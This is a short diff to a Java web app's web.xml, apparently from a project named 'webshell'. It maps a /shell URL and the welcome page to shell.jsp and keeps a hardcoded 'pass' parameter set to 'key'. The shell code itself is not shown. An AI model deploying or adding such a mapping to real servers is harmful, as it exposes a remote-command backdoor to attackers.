--- a/src/main/webapp/WEB-INF/web.xml
+++ b/src/main/webapp/WEB-INF/web.xml
@@ -3,12 +3,28 @@
  "http://java.sun.com/dtd/web-app_2_3.dtd" >
 
 <web-app>
+
     <display-name>webshell</display-name>
+
     <context-param>
         <param-name>pass</param-name>
         <param-value>key</param-value>
     </context-param>
+
+    <servlet>
+        <servlet-name>shell</servlet-name>
+        <jsp-file>/shell.jsp</jsp-file>
+        <init-param>
+            <param-name>suppressSmap</param-name>
+            <param-value>false</param-value>
+        </init-param>
+    </servlet>
+    <servlet-mapping>
+        <servlet-name>shell</servlet-name>
+        <url-pattern>/shell</url-pattern>
+    </servlet-mapping>
     <welcome-file-list>
         <welcome-file>shell.jsp</welcome-file>
     </welcome-file-list>
+
 </web-app>
